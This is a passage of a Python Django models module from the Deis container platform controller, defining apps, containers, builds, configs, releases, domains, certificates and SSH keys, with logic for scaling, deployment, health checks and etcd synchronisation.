    updated = models.DateTimeField(auto_now=True)

    class Meta:
        """Mark :class:`AuditedModel` as abstract."""
        abstract = True
def select_app_name():
    """Select a unique randomly generated app name"""
    name = utils.generate_app_name()
    # re-roll until the generated name is not already taken by an App
    while App.objects.filter(id=name).exists():
        name = utils.generate_app_name()
    return name
class UuidAuditedModel(AuditedModel):
    """Add a UUID primary key to an :class:`AuditedModel`."""
    uuid = fields.UuidField('UUID', primary_key=True)

    class Meta:
        """Mark :class:`UuidAuditedModel` as abstract."""
        abstract = True
@python_2_unicode_compatible
class App(UuidAuditedModel):
    """
    Application used to service requests on behalf of end-users
    """
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    # slug id doubles as the docker image / hostname component
    id = models.SlugField(max_length=64, unique=True, default=select_app_name,
                          validators=[validate_id_is_docker_compatible,
                                      validate_reserved_names])
    # mapping of process type -> desired container count
    structure = JSONField(default={}, blank=True, validators=[validate_app_structure])

    class Meta:
        permissions = (('use_app', 'Can use app'),)

    @property
    def _scheduler(self):
        # A fresh scheduler client is built on every access from settings.
        mod = importlib.import_module(settings.SCHEDULER_MODULE)
        return mod.SchedulerClient(settings.SCHEDULER_URL,
                                   settings.SCHEDULER_AUTH,
                                   settings.SCHEDULER_OPTIONS)

    def __str__(self):
        return self.id

    @property
    def url(self):
        # public hostname of the app under the cluster domain
        return self.id + '.' + settings.DEIS_DOMAIN

    def _get_job_id(self, container_type):
        # Scheduler job id: "<app>_v<version>.<type>", e.g. "myapp_v2.web".
        app = self.id
        release = self.release_set.latest()
        version = "v{}".format(release.version)
        job_id = "{app}_{version}.{container_type}".format(**locals())
        return job_id

    def _get_command(self, container_type):
        """Return the command to run for the given process type."""
        try:
            # if this is not procfile-based app, ensure they cannot break out
            # and run arbitrary commands on the host
            # FIXME: remove slugrunner's hardcoded entrypoint
            release = self.release_set.latest()
            if release.build.dockerfile or not release.build.sha:
                return "bash -c '{}'".format(release.build.procfile[container_type])
            else:
                return 'start {}'.format(container_type)
        # if the key is not present or if a parent attribute is None
        except (KeyError, TypeError, AttributeError):
            # handle special case for Dockerfile deployments
            return '' if container_type == 'cmd' else 'start {}'.format(container_type)

    def log(self, message, level=logging.INFO):
        """Logs a message in the context of this application.

        This prefixes log messages with an application "tag" that the customized deis-logspout will
        be on the lookout for.  When it's seen, the message-- usually an application event of some
        sort like releasing or scaling, will be considered as "belonging" to the application
        instead of the controller and will be handled accordingly.
        """
        logger.log(level, "[{}]: {}".format(self.id, message))

    def create(self, *args, **kwargs):
        """Create a new application with an initial config and release"""
        config = Config.objects.create(owner=self.owner, app=self)
        Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None)

    def delete(self, *args, **kwargs):
        """Delete this application including all containers"""
        try:
            # attempt to remove containers from the scheduler
            self._destroy_containers([c for c in self.container_set.exclude(type='run')])
        except RuntimeError:
            # best-effort: DB rows are removed even if the scheduler failed
            pass
        self._clean_app_logs()
        return super(App, self).delete(*args, **kwargs)

    def restart(self, **kwargs):
        """Restart containers, optionally filtered by 'type' and/or 'num'."""
        to_restart = self.container_set.all()
        if kwargs.get('type'):
            to_restart = to_restart.filter(type=kwargs.get('type'))
        if kwargs.get('num'):
            to_restart = to_restart.filter(num=kwargs.get('num'))
        self._restart_containers(to_restart)
        return to_restart

    def _clean_app_logs(self):
        """Delete application logs stored by the logger component"""
        try:
            url = 'http://{}:{}/{}/'.format(settings.LOGGER_HOST, settings.LOGGER_PORT, self.id)
            requests.delete(url)
        except Exception as e:
            # Ignore errors deleting application logs.  An error here should not interfere with
            # the overall success of deleting an application, but we should log it.
            err = 'Error deleting existing application logs: {}'.format(e)
            log_event(self, err, logging.WARNING)

    def scale(self, user, structure):  # noqa
        """Scale containers up or down to match requested structure."""
        if self.release_set.latest().build is None:
            raise EnvironmentError('No build associated with this release')
        requested_structure = structure.copy()
        release = self.release_set.latest()
        # test for available process types
        available_process_types = release.build.procfile or {}
        for container_type in requested_structure:
            if container_type == 'cmd':
                continue  # allow docker cmd types in case we don't have the image source
            if container_type not in available_process_types:
                raise EnvironmentError(
                    'Container type {} does not exist in application'.format(container_type))
        msg = '{} scaled containers '.format(user.username) + ' '.join(
            "{}={}".format(k, v) for k, v in requested_structure.items())
        log_event(self, msg)
        # iterate and scale by container type (web, worker, etc)
        changed = False
        to_add, to_remove = [], []
        scale_types = {}
        # iterate on a copy of the container_type keys
        for container_type in requested_structure.keys():
            containers = list(self.container_set.filter(type=container_type).order_by('created'))
            # increment new container nums off the most recent container
            results = self.container_set.filter(type=container_type).aggregate(Max('num'))
            container_num = (results.get('num__max') or 0) + 1
            requested = requested_structure.pop(container_type)
            diff = requested - len(containers)
            if diff == 0:
                continue
            changed = True
            scale_types[container_type] = requested
            while diff < 0:
                # scaling down: pop from the end, i.e. the newest container
                c = containers.pop()
                to_remove.append(c)
                diff += 1
            while diff > 0:
                # create a database record
                c = Container.objects.create(owner=self.owner,
                                             app=self,
                                             release=release,
                                             type=container_type,
                                             num=container_num)
                to_add.append(c)
                container_num += 1
                diff -= 1
        if changed:
            # prefer the scheduler's native scale() when the backend has one
            if "scale" in dir(self._scheduler):
                self._scale_containers(scale_types, to_remove)
            else:
                if to_add:
                    self._start_containers(to_add)
                if to_remove:
                    self._destroy_containers(to_remove)
        # save new structure to the database
        vals = self.container_set.exclude(type='run').values(
            'type').annotate(Count('pk')).order_by()
        new_structure = structure.copy()
        new_structure.update({v['type']: v['pk__count'] for v in vals})
        self.structure = new_structure
        self.save()
        return changed

    def _scale_containers(self, scale_types, to_remove):
        """Delegate scaling to the scheduler backend, then delete DB rows for
        removed containers."""
        release = self.release_set.latest()
        for scale_type in scale_types:
            image = release.image
            version = "v{}".format(release.version)
            kwargs = {'memory': release.config.memory,
                      'cpu': release.config.cpu,
                      'tags': release.config.tags,
                      'version': version,
                      'aname': self.id,
                      'num': scale_types[scale_type]}
            job_id = self._get_job_id(scale_type)
            command = self._get_command(scale_type)
            try:
                self._scheduler.scale(
                    name=job_id,
                    image=image,
                    command=command,
                    **kwargs)
            except Exception as e:
                err = '{} (scale): {}'.format(job_id, e)
                log_event(self, err, logging.ERROR)
                raise
        [c.delete() for c in to_remove]

    def _start_containers(self, to_add):
        """Creates and starts containers via the scheduler"""
        if not to_add:
            return
        # create all containers in parallel, then start them in parallel
        create_threads = [Thread(target=c.create) for c in to_add]
        start_threads = [Thread(target=c.start) for c in to_add]
        [t.start() for t in create_threads]
        [t.join() for t in create_threads]
        if any(c.state != 'created' for c in to_add):
            err = 'aborting, failed to create some containers'
            log_event(self, err, logging.ERROR)
            self._destroy_containers(to_add)
            raise RuntimeError(err)
        [t.start() for t in start_threads]
        [t.join() for t in start_threads]
        if set([c.state for c in to_add]) != set(['up']):
            err = 'warning, some containers failed to start'
            log_event(self, err, logging.WARNING)
        # if the user specified a health check, try checking to see if it's running
        try:
            config = self.config_set.latest()
            if 'HEALTHCHECK_URL' in config.values.keys():
                self._healthcheck(to_add, config.values)
        except Config.DoesNotExist:
            pass

    def _healthcheck(self, containers, config):
        """Poll the app's health check URL, retrying with scaled delays, and
        destroy all containers if every attempt fails."""
        # if at first it fails, back off and try again at 10%, 50% and 100% of INITIAL_DELAY
        intervals = [1.0, 0.1, 0.5, 1.0]
        # HACK (bacongobbler): we need to wait until publisher has a chance to publish each
        # service to etcd, which can take up to 20 seconds.
        time.sleep(20)
        for i in xrange(len(intervals)):
            delay = int(config.get('HEALTHCHECK_INITIAL_DELAY', 0))
            try:
                # sleep until the initial timeout is over
                if delay > 0:
                    time.sleep(delay * intervals[i])
                to_healthcheck = [c for c in containers if c.type in ['web', 'cmd']]
                self._do_healthcheck(to_healthcheck, config)
                break
            except exceptions.HealthcheckException as e:
                try:
                    next_delay = delay * intervals[i+1]
                    msg = "{}; trying again in {} seconds".format(e, next_delay)
                    log_event(self, msg, logging.WARNING)
                except IndexError:
                    # out of retries; the for-else below will abort
                    log_event(self, e, logging.WARNING)
        else:
            # loop finished without a successful check (no break)
            self._destroy_containers(containers)
            msg = "aborting, app containers failed to respond to health check"
            log_event(self, msg, logging.ERROR)
            raise RuntimeError(msg)

    def _do_healthcheck(self, containers, config):
        """GET HEALTHCHECK_URL on each web/cmd container; raise
        HealthcheckException on any non-200 answer or connection failure."""
        path = config.get('HEALTHCHECK_URL', '/')
        timeout = int(config.get('HEALTHCHECK_TIMEOUT', 1))
        # NOTE(review): _etcd_client is not defined in this part of the
        # module; presumably a module-level handle created from
        # get_etcd_client() further down the file — confirm.
        if not _etcd_client:
            raise exceptions.HealthcheckException('no etcd client available')
        for container in containers:
            try:
                # the container's published address is looked up in etcd
                key = "/deis/services/{self}/{container.job_id}".format(**locals())
                url = "http://{}{}".format(_etcd_client.get(key).value, path)
                response = requests.get(url, timeout=timeout)
                if response.status_code != requests.codes.OK:
                    raise exceptions.HealthcheckException(
                        "app failed health check (got '{}', expected: '200')".format(
                            response.status_code))
            except (requests.Timeout, requests.ConnectionError, KeyError) as e:
                raise exceptions.HealthcheckException(
                    'failed to connect to container ({})'.format(e))

    def _restart_containers(self, to_restart):
        """Restarts containers via the scheduler"""
        if not to_restart:
            return
        stop_threads = [Thread(target=c.stop) for c in to_restart]
        start_threads = [Thread(target=c.start) for c in to_restart]
        [t.start() for t in stop_threads]
        [t.join() for t in stop_threads]
        # NOTE(review): this checks state != 'created' after stopping —
        # verify the scheduler really reports 'created' for stopped jobs.
        if any(c.state != 'created' for c in to_restart):
            err = 'warning, some containers failed to stop'
            log_event(self, err, logging.WARNING)
        [t.start() for t in start_threads]
        [t.join() for t in start_threads]
        if any(c.state != 'up' for c in to_restart):
            err = 'warning, some containers failed to start'
            log_event(self, err, logging.WARNING)

    def _destroy_containers(self, to_destroy):
        """Destroys containers via the scheduler"""
        if not to_destroy:
            return
        destroy_threads = [Thread(target=c.destroy) for c in to_destroy]
        [t.start() for t in destroy_threads]
        [t.join() for t in destroy_threads]
        # only delete DB rows for containers the scheduler actually destroyed
        [c.delete() for c in to_destroy if c.state == 'destroyed']
        if any(c.state != 'destroyed' for c in to_destroy):
            err = 'aborting, failed to destroy some containers'
            log_event(self, err, logging.ERROR)
            raise RuntimeError(err)

    def deploy(self, user, release):
        """Deploy a new release to this application"""
        existing = self.container_set.exclude(type='run')
        new = []
        scale_types = set()
        # clone every existing container onto the new release
        for e in existing:
            n = e.clone(release)
            n.save()
            new.append(n)
            scale_types.add(e.type)
        if new and "deploy" in dir(self._scheduler):
            self._deploy_app(scale_types, release, existing)
        else:
            self._start_containers(new)
            # destroy old containers
            if existing:
                self._destroy_containers(existing)
        # perform default scaling if necessary
        if self.structure == {} and release.build is not None:
            self._default_scale(user, release)

    def _deploy_app(self, scale_types, release, existing):
        """Delegate the deploy to the scheduler backend, then delete DB rows
        for the replaced containers."""
        for scale_type in scale_types:
            image = release.image
            version = "v{}".format(release.version)
            kwargs = {'memory': release.config.memory,
                      'cpu': release.config.cpu,
                      'tags': release.config.tags,
                      'aname': self.id,
                      'num': 0,
                      'version': version}
            job_id = self._get_job_id(scale_type)
            command = self._get_command(scale_type)
            try:
                self._scheduler.deploy(
                    name=job_id,
                    image=image,
                    command=command,
                    **kwargs)
            except Exception as e:
                err = '{} (deploy): {}'.format(job_id, e)
                log_event(self, err, logging.ERROR)
                raise
        [c.delete() for c in existing]

    def _default_scale(self, user, release):
        """Scale to default structure based on release type"""
        # if there is no SHA, assume a docker image is being promoted
        if not release.build.sha:
            structure = {'cmd': 1}
        # if a dockerfile exists without a procfile, assume docker workflow
        elif release.build.dockerfile and not release.build.procfile:
            structure = {'cmd': 1}
        # if a procfile exists without a web entry, assume docker workflow
        elif release.build.procfile and 'web' not in release.build.procfile:
            structure = {'cmd': 1}
        # default to heroku workflow
        else:
            structure = {'web': 1}
        self.scale(user, structure)

    def logs(self, log_lines=str(settings.LOG_LINES)):
        """Return aggregated log data for this application."""
        try:
            url = "http://{}:{}/{}?log_lines={}".format(settings.LOGGER_HOST, settings.LOGGER_PORT,
                                                        self.id, log_lines)
            r = requests.get(url)
        # Handle HTTP request errors
        except requests.exceptions.RequestException as e:
            logger.error("Error accessing deis-logger using url '{}': {}".format(url, e))
            raise e
        # Handle logs empty or not found
        if r.status_code == 204 or r.status_code == 404:
            logger.info("GET {} returned a {} status code".format(url, r.status_code))
            raise EnvironmentError('Could not locate logs')
        # Handle unanticipated status codes
        if r.status_code != 200:
            logger.error("Error accessing deis-logger: GET {} returned a {} status code"
                         .format(url, r.status_code))
            raise EnvironmentError('Error accessing deis-logger')
        return r.content

    def run(self, user, command):
        """Run a one-off command in an ephemeral app container."""
        if self.release_set.latest().build is None:
            raise EnvironmentError('No build associated with this release to run this command')
        # TODO: add support for interactive shell
        msg = "{} runs '{}'".format(user.username, command)
        log_event(self, msg)
        # one-off containers get the next free num within type 'run'
        c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1
        # create database record for run process
        c = Container.objects.create(owner=self.owner,
                                     app=self,
                                     release=self.release_set.latest(),
                                     type='run',
                                     num=c_num)
        image = c.release.image
        # check for backwards compatibility
        def _has_hostname(image):
            repo, tag = dockerutils.parse_repository_tag(image)
            return True if '/' in repo and '.' in repo.split('/')[0] else False
        if not _has_hostname(image):
            image = '{}:{}/{}'.format(settings.REGISTRY_HOST,
                                      settings.REGISTRY_PORT,
                                      image)
        # SECURITY: shell-escape user input
        escaped_command = command.replace("'", "'\\''")
        return c.run(escaped_command)
@python_2_unicode_compatible
class Container(UuidAuditedModel):
    """
    Docker container used to securely host an application process.
    """
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    release = models.ForeignKey('Release')
    # process type from the Procfile (web, worker, ...) or 'cmd'/'run'
    type = models.CharField(max_length=128, blank=False)
    num = models.PositiveIntegerField()

    @property
    def _scheduler(self):
        # delegate to the owning app's scheduler client
        return self.app._scheduler

    @property
    def state(self):
        # live state as reported by the scheduler backend
        return self._scheduler.state(self.job_id).name

    def short_name(self):
        return "{}.{}.{}".format(self.app.id, self.type, self.num)
    short_name.short_description = 'Name'

    def __str__(self):
        return self.short_name()

    class Meta:
        get_latest_by = '-created'
        ordering = ['created']

    @property
    def job_id(self):
        # scheduler job name: "<app>_v<version>.<type>.<num>"
        version = "v{}".format(self.release.version)
        return "{self.app.id}_{version}.{self.type}.{self.num}".format(**locals())

    def _get_command(self):
        """Return the container command for this container's process type."""
        try:
            # if this is not procfile-based app, ensure they cannot break out
            # and run arbitrary commands on the host
            # FIXME: remove slugrunner's hardcoded entrypoint
            if self.release.build.dockerfile or not self.release.build.sha:
                return "bash -c '{}'".format(self.release.build.procfile[self.type])
            else:
                return 'start {}'.format(self.type)
        # if the key is not present or if a parent attribute is None
        except (KeyError, TypeError, AttributeError):
            # handle special case for Dockerfile deployments
            return '' if self.type == 'cmd' else 'start {}'.format(self.type)

    _command = property(_get_command)

    def clone(self, release):
        """Copy this container's identity (type/num) onto a new release."""
        c = Container.objects.create(owner=self.owner,
                                     app=self.app,
                                     release=release,
                                     type=self.type,
                                     num=self.num)
        return c

    @close_db_connections
    def create(self):
        """Ask the scheduler to create the container (does not start it)."""
        image = self.release.image
        kwargs = {'memory': self.release.config.memory,
                  'cpu': self.release.config.cpu,
                  'tags': self.release.config.tags}
        try:
            self._scheduler.create(
                name=self.job_id,
                image=image,
                command=self._command,
                **kwargs)
        except Exception as e:
            err = '{} (create): {}'.format(self.job_id, e)
            log_event(self.app, err, logging.ERROR)
            raise

    @close_db_connections
    def start(self):
        """Start a previously created container via the scheduler."""
        try:
            self._scheduler.start(self.job_id)
        except Exception as e:
            err = '{} (start): {}'.format(self.job_id, e)
            log_event(self.app, err, logging.WARNING)
            raise

    @close_db_connections
    def stop(self):
        """Stop the container via the scheduler."""
        try:
            self._scheduler.stop(self.job_id)
        except Exception as e:
            err = '{} (stop): {}'.format(self.job_id, e)
            log_event(self.app, err, logging.ERROR)
            raise

    @close_db_connections
    def destroy(self):
        """Destroy the container via the scheduler."""
        try:
            self._scheduler.destroy(self.job_id)
        except Exception as e:
            err = '{} (destroy): {}'.format(self.job_id, e)
            log_event(self.app, err, logging.ERROR)
            raise

    def run(self, command):
        """Run a one-off command"""
        if self.release.build is None:
            raise EnvironmentError('No build associated with this release '
                                   'to run this command')
        image = self.release.image
        entrypoint = '/bin/bash'
        # if this is a procfile-based app, switch the entrypoint to slugrunner's default
        # FIXME: remove slugrunner's hardcoded entrypoint
        if self.release.build.procfile and \
           self.release.build.sha and not \
           self.release.build.dockerfile:
            entrypoint = '/runner/init'
            command = "'{}'".format(command)
        else:
            command = "-c '{}'".format(command)
        try:
            rc, output = self._scheduler.run(self.job_id, image, entrypoint, command)
            return rc, output
        except Exception as e:
            err = '{} (run): {}'.format(self.job_id, e)
            log_event(self.app, err, logging.ERROR)
            raise
@python_2_unicode_compatible
class Push(UuidAuditedModel):
    """
    Instance of a push used to trigger an application build
    """
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    sha = models.CharField(max_length=40)
    # presumably populated from the SSH git-receive environment — confirm
    # against the builder component
    fingerprint = models.CharField(max_length=255)
    receive_user = models.CharField(max_length=255)
    receive_repo = models.CharField(max_length=255)
    ssh_connection = models.CharField(max_length=255)
    ssh_original_command = models.CharField(max_length=255)

    class Meta:
        get_latest_by = 'created'
        ordering = ['-created']
        unique_together = (('app', 'uuid'),)

    def __str__(self):
        return "{0}-{1}".format(self.app.id, self.sha[:7])
@python_2_unicode_compatible
class Build(UuidAuditedModel):
    """
    Instance of a software build used by runtime nodes
    """
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    image = models.CharField(max_length=256)

    # optional fields populated by builder
    sha = models.CharField(max_length=40, blank=True)
    procfile = JSONField(default={}, blank=True)
    dockerfile = models.TextField(blank=True)

    class Meta:
        get_latest_by = 'created'
        ordering = ['-created']
        unique_together = (('app', 'uuid'),)

    def create(self, user, *args, **kwargs):
        """Create a release from this build and deploy it, deleting the new
        release again if the deploy raises RuntimeError."""
        latest_release = self.app.release_set.latest()
        source_version = 'latest'
        if self.sha:
            source_version = 'git-{}'.format(self.sha)
        new_release = latest_release.new(user,
                                         build=self,
                                         config=latest_release.config,
                                         source_version=source_version)
        try:
            self.app.deploy(user, new_release)
            return new_release
        except RuntimeError:
            # roll back the release record so app state stays consistent
            new_release.delete()
            raise

    def save(self, **kwargs):
        # Before persisting, destroy containers whose process type no longer
        # exists in this build's Procfile.
        try:
            previous_build = self.app.build_set.latest()
            to_destroy = []
            for proctype in previous_build.procfile:
                if proctype not in self.procfile:
                    for c in self.app.container_set.filter(type=proctype):
                        to_destroy.append(c)
            self.app._destroy_containers(to_destroy)
        except Build.DoesNotExist:
            # first build for this app: nothing to clean up
            pass
        return super(Build, self).save(**kwargs)

    def __str__(self):
        return "{0}-{1}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Config(UuidAuditedModel):
    """
    Set of configuration values applied as environment variables
    during runtime execution of the Application.
    """
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    values = JSONField(default={}, blank=True)
    memory = JSONField(default={}, blank=True)
    cpu = JSONField(default={}, blank=True)
    tags = JSONField(default={}, blank=True)

    class Meta:
        get_latest_by = 'created'
        ordering = ['-created']
        unique_together = (('app', 'uuid'),)

    def __str__(self):
        return "{}-{}".format(self.app.id, self.uuid[:7])

    def save(self, **kwargs):
        """merge the old config with the new"""
        try:
            previous_config = self.app.config_set.latest()
            for attr in ['cpu', 'memory', 'tags', 'values']:
                # Guard against migrations from older apps without fixes to
                # JSONField encoding.
                try:
                    data = getattr(previous_config, attr).copy()
                except AttributeError:
                    data = {}
                try:
                    new_data = getattr(self, attr).copy()
                except AttributeError:
                    new_data = {}
                data.update(new_data)
                # remove config keys if we provided a null value
                # (viewitems() is Python 2 only; this module targets Python 2)
                [data.pop(k) for k, v in new_data.viewitems() if v is None]
                setattr(self, attr, data)
        except Config.DoesNotExist:
            # first config for this app: nothing to merge
            pass
        return super(Config, self).save(**kwargs)
@python_2_unicode_compatible
class Release(UuidAuditedModel):
    """
    Software release deployed by the application platform

    Releases contain a :class:`Build` and a :class:`Config`.
    """
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    version = models.PositiveIntegerField()
    summary = models.TextField(blank=True, null=True)
    config = models.ForeignKey('Config')
    build = models.ForeignKey('Build', null=True)

    class Meta:
        get_latest_by = 'created'
        ordering = ['-created']
        unique_together = (('app', 'version'),)

    def __str__(self):
        return "{0}-v{1}".format(self.app.id, self.version)

    @property
    def image(self):
        # per-app, per-version tag used as the publish target
        return '{}:v{}'.format(self.app.id, str(self.version))

    def new(self, user, config, build, summary=None, source_version='latest'):
        """
        Create a new application release using the provided Build and Config
        on behalf of a user.

        Releases start at v1 and auto-increment.
        """
        # construct fully-qualified target image
        new_version = self.version + 1
        # create new release and auto-increment version
        release = Release.objects.create(
            owner=user, app=self.app, config=config,
            build=build, version=new_version, summary=summary)
        try:
            release.publish()
        except EnvironmentError as e:
            # If we cannot publish this app, just log and carry on
            log_event(self.app, e)
            pass
        return release

    def publish(self, source_version='latest'):
        """Tag/publish this release's image to the registry.

        Raises EnvironmentError when the release has no build.
        """
        if self.build is None:
            raise EnvironmentError('No build associated with this release to publish')
        source_image = self.build.image
        if ':' not in source_image:
            source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version
            source_image = "{}:{}".format(source_image, source_tag)
        # If the build has a SHA, assume it's from deis-builder and in the deis-registry already
        deis_registry = bool(self.build.sha)
        publish_release(source_image, self.config.values, self.image, deis_registry)

    def previous(self):
        """
        Return the previous Release to this one.

        :return: the previous :class:`Release`, or None
        """
        releases = self.app.release_set
        if self.pk:
            releases = releases.exclude(pk=self.pk)
        try:
            # Get the Release previous to this one
            prev_release = releases.latest()
        except Release.DoesNotExist:
            prev_release = None
        return prev_release

    def rollback(self, user, version):
        """Create a new release from the build/config of an older version."""
        # NOTE(review): the message says "below 0" but the check rejects
        # anything < 1 — confirm the intended lower bound.
        if version < 1:
            raise EnvironmentError('version cannot be below 0')
        summary = "{} rolled back to v{}".format(user, version)
        prev = self.app.release_set.get(version=version)
        new_release = self.new(
            user,
            build=prev.build,
            config=prev.config,
            summary=summary,
            source_version='v{}'.format(version))
        try:
            self.app.deploy(user, new_release)
            return new_release
        except RuntimeError:
            new_release.delete()
            raise

    def save(self, *args, **kwargs):  # noqa
        """Build a human-readable summary of what changed in this release."""
        if not self.summary:
            self.summary = ''
            prev_release = self.previous()
            # compare this build to the previous build
            old_build = prev_release.build if prev_release else None
            old_config = prev_release.config if prev_release else None
            # if the build changed, log it and who pushed it
            if self.version == 1:
                self.summary += "{} created initial release".format(self.app.owner)
            elif self.build != old_build:
                if self.build.sha:
                    self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7])
                else:
                    self.summary += "{} deployed {}".format(self.build.owner, self.build.image)
            # if the config data changed, log the dict diff
            if self.config != old_config:
                dict1 = self.config.values
                dict2 = old_config.values if old_config else {}
                diff = dict_diff(dict1, dict2)
                # try to be as succinct as possible
                added = ', '.join(k for k in diff.get('added', {}))
                added = 'added ' + added if added else ''
                changed = ', '.join(k for k in diff.get('changed', {}))
                changed = 'changed ' + changed if changed else ''
                deleted = ', '.join(k for k in diff.get('deleted', {}))
                deleted = 'deleted ' + deleted if deleted else ''
                changes = ', '.join(i for i in (added, changed, deleted) if i)
                if changes:
                    if self.summary:
                        self.summary += ' and '
                    self.summary += "{} {}".format(self.config.owner, changes)
                # if the limits changed (memory or cpu), log the dict diff
                changes = []
                old_mem = old_config.memory if old_config else {}
                diff = dict_diff(self.config.memory, old_mem)
                if diff.get('added') or diff.get('changed') or diff.get('deleted'):
                    changes.append('memory')
                old_cpu = old_config.cpu if old_config else {}
                diff = dict_diff(self.config.cpu, old_cpu)
                if diff.get('added') or diff.get('changed') or diff.get('deleted'):
                    changes.append('cpu')
                if changes:
                    changes = 'changed limits for '+', '.join(changes)
                    self.summary += "{} {}".format(self.config.owner, changes)
                # if the tags changed, log the dict diff
                changes = []
                old_tags = old_config.tags if old_config else {}
                diff = dict_diff(self.config.tags, old_tags)
                # try to be as succinct as possible
                added = ', '.join(k for k in diff.get('added', {}))
                added = 'added tag ' + added if added else ''
                changed = ', '.join(k for k in diff.get('changed', {}))
                changed = 'changed tag ' + changed if changed else ''
                deleted = ', '.join(k for k in diff.get('deleted', {}))
                deleted = 'deleted tag ' + deleted if deleted else ''
                changes = ', '.join(i for i in (added, changed, deleted) if i)
                if changes:
                    if self.summary:
                        self.summary += ' and '
                    self.summary += "{} {}".format(self.config.owner, changes)
            # fallback summaries when nothing above produced text
            if not self.summary:
                if self.version == 1:
                    self.summary = "{} created the initial release".format(self.owner)
                else:
                    self.summary = "{} changed nothing".format(self.owner)
        super(Release, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Domain(AuditedModel):
    """Custom domain name attached to an App."""
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    domain = models.TextField(blank=False, null=False, unique=True)

    def __str__(self):
        return self.domain
@python_2_unicode_compatible
class Certificate(AuditedModel):
    """
    Public and private key pair used to secure application traffic at the router.
    """
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    # there is no upper limit on the size of an x.509 certificate
    certificate = models.TextField(validators=[validate_certificate])
    key = models.TextField()
    # X.509 certificates allow any string of information as the common name.
    common_name = models.TextField(unique=True)
    expires = models.DateTimeField()

    def __str__(self):
        return self.common_name

    def _get_certificate(self):
        """Parse the PEM certificate; raise SuspiciousOperation on bad input."""
        try:
            return crypto.load_certificate(crypto.FILETYPE_PEM, self.certificate)
        except crypto.Error as e:
            raise SuspiciousOperation(e)

    def save(self, *args, **kwargs):
        """Derive common_name and expires from the certificate if unset."""
        certificate = self._get_certificate()
        if not self.common_name:
            self.common_name = certificate.get_subject().CN
        if not self.expires:
            # convert openssl's expiry date format to Django's DateTimeField format
            # NOTE(review): get_notAfter() returns bytes on Python 3; this
            # parsing assumes the Python 2 str return — confirm interpreter.
            self.expires = datetime.strptime(certificate.get_notAfter(), '%Y%m%d%H%M%SZ')
        return super(Certificate, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Key(UuidAuditedModel):
    """An SSH public key."""
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    id = models.CharField(max_length=128)
    public = models.TextField(unique=True, validators=[validate_base64])
    # derived from `public` on every save; never set directly
    fingerprint = models.CharField(max_length=128)

    class Meta:
        verbose_name = 'SSH Key'
        # FIX: was (('owner', 'fingerprint')) — redundant parentheses, not a
        # nested tuple.  Django accepts the flat form with identical effect,
        # but normalize to a tuple of tuples for consistency with the other
        # models in this module.
        unique_together = (('owner', 'fingerprint'),)

    def __str__(self):
        return "{}...{}".format(self.public[:18], self.public[-31:])

    def save(self, *args, **kwargs):
        """Recompute the fingerprint from the public key before saving."""
        self.fingerprint = fingerprint(self.public)
        return super(Key, self).save(*args, **kwargs)
# define update/delete callbacks for synchronizing
# models with the configuration management backend
def _log_build_created(**kwargs):
    """post_save hook: log creation of a Build (controller log only)."""
    if not kwargs.get('created'):
        return
    build = kwargs['instance']
    # the release summary carries the user-facing event
    logger.info("{}: build {} created".format(build.app, build))
def _log_release_created(**kwargs):
    """post_save hook: log a new Release and append its summary to the app log."""
    if not kwargs.get('created'):
        return
    release = kwargs['instance']
    # controller-side log only; the summary is the user-facing record
    logger.info("{}: release {} created".format(release.app, release))
    # append release lifecycle logs to the app
    release.app.log(release.summary)
def _log_config_updated(**kwargs):
    """post_save hook: log that an app's Config changed (controller log only)."""
    config = kwargs['instance']
    logger.info("{}: config {} updated".format(config.app, config))
def _log_domain_added(**kwargs):
    """post_save hook: record a newly added Domain against its app."""
    if not kwargs.get('created'):
        return
    domain = kwargs['instance']
    log_event(domain.app, "domain {} added".format(domain))
def _log_domain_removed(**kwargs):
    """post_delete hook: record removal of a Domain against its app."""
    domain = kwargs['instance']
    log_event(domain.app, "domain {} removed".format(domain))
def _log_cert_added(**kwargs):
    """post_save hook: log creation of a Certificate."""
    if kwargs.get('created'):
        logger.info("cert {} added".format(kwargs['instance']))
def _log_cert_removed(**kwargs):
    """post_delete hook: log deletion of a Certificate."""
    logger.info("cert {} removed".format(kwargs['instance']))
def _etcd_publish_key(**kwargs):
    """post_save hook: publish an SSH key under the builder's etcd tree."""
    key = kwargs['instance']
    path = '/deis/builder/users/{}/{}'.format(
        key.owner.username, fingerprint(key.public))
    _etcd_client.write(path, key.public)
def _etcd_purge_key(**kwargs):
    """post_delete hook: remove an SSH key from etcd (no-op if absent)."""
    key = kwargs['instance']
    path = '/deis/builder/users/{}/{}'.format(
        key.owner.username, fingerprint(key.public))
    try:
        _etcd_client.delete(path)
    except KeyError:
        # the key was never published
        pass
def _etcd_purge_user(**kwargs):
    """post_delete hook: drop a user's entire builder key directory."""
    user_dir = '/deis/builder/users/{}'.format(kwargs['instance'].username)
    try:
        _etcd_client.delete(user_dir, dir=True, recursive=True)
    except KeyError:
        # If _etcd_publish_key() wasn't called, there is no user dir to delete.
        pass
def _etcd_publish_app(**kwargs):
    """post_save hook: create the app's services directory in etcd."""
    appname = kwargs['instance']
    try:
        _etcd_client.write('/deis/services/{}'.format(appname), None, dir=True)
    except KeyError:
        # the directory already exists
        pass
def _etcd_purge_app(**kwargs):
    """post_delete hook: remove the app's services directory (no-op if absent)."""
    appname = kwargs['instance']
    try:
        _etcd_client.delete('/deis/services/{}'.format(appname),
                            dir=True, recursive=True)
    except KeyError:
        pass
def _etcd_publish_cert(**kwargs):
    """post_save hook: publish the cert and its private key under /deis/certs."""
    cert = kwargs['instance']
